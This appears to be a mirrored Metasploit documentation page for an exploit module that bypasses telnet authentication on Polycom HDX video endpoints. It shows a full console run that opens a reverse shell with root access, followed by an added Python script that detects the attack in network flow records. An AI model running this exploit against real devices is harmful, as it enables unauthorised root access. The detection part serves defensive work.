Mirror of metasploit

psh_auth_bypass.md

Vulnerable Application

This module exploits an authentication bypass in Polycom HDX video endpoints running software version 3.0.5 or earlier. It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port 23 must be reachable, as it is in the factory default configuration.

Verification Steps

A successful run of the exploit looks like this:

msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
msf exploit(psh_auth_bypass) > run

[*] Started reverse double SSL handler on 192.168.1.120:4444
[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xInxktvgUmm7hPyh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xInxktvgUmm7hPyh\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
[*] 192.168.1.155:23 - Shutting down payload stager listener...

whoami
root
uname -a
Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
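
Detection sketch (an added example, not part of the module or its documentation): the console output above shows a burst of telnet connections to the endpoint ("6 threads with 100 max connections") followed by the endpoint itself connecting back to the host that produced the burst. The script below flags that sequence in flow records. The record format, the thresholds and the hosts 192.168.1.50 and 192.168.1.200 are assumptions, and the sample flows are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TELNET_PORT = 23
BURST_MIN = 10                            # assumed: telnet connects that count as a burst
BURST_WINDOW = timedelta(seconds=60)      # assumed: window in which the burst must fit
CALLBACK_WINDOW = timedelta(seconds=120)  # assumed: max delay from burst to callback

# Constructed flow records (time, src_ip, dst_ip, dst_port); not captured traffic.
_T0 = datetime(2016, 8, 1, 13, 48, 0)
SAMPLE_FLOWS = (
    [(_T0 + timedelta(seconds=i), "192.168.1.120", "192.168.1.155", 23) for i in range(40)]
    + [(_T0 + timedelta(seconds=s), "192.168.1.155", "192.168.1.120", 4444) for s in (45, 46)]
    + [(_T0 + timedelta(minutes=5), "192.168.1.50", "192.168.1.155", 23)]     # single admin login
    + [(_T0 + timedelta(minutes=6), "192.168.1.155", "192.168.1.200", 1720)]  # ordinary H.323 call
)

def find_bypass_patterns(flows):
    """Return one alert per (source, endpoint) pair showing a telnet burst plus callback."""
    flows = sorted(flows)
    telnet = defaultdict(list)            # (src, endpoint) -> sorted telnet connect times
    for ts, src, dst, port in flows:
        if port == TELNET_PORT:
            telnet[(src, dst)].append(ts)
    alerts = []
    for (src, endpoint), times in telnet.items():
        burst = None
        # Find the first run of BURST_MIN connects that fits inside BURST_WINDOW.
        for i in range(len(times) - BURST_MIN + 1):
            if times[i + BURST_MIN - 1] - times[i] <= BURST_WINDOW:
                burst = (times[i], times[i + BURST_MIN - 1])
                break
        if burst is None:
            continue
        # Callback: the endpoint opens a connection to the host that sent the burst.
        ports = sorted({port for ts, s, d, port in flows
                        if s == endpoint and d == src
                        and burst[0] <= ts <= burst[1] + CALLBACK_WINDOW})
        if ports:
            alerts.append({"source": src, "endpoint": endpoint,
                           "telnet_connects": len(times), "callback_ports": ports})
    return alerts

if __name__ == "__main__":
    for alert in find_bypass_patterns(SAMPLE_FLOWS):
        print(alert)
```

Neither signal alone raises an alert: a telnet burst with no callback, or an outbound connection with no preceding burst, is ignored.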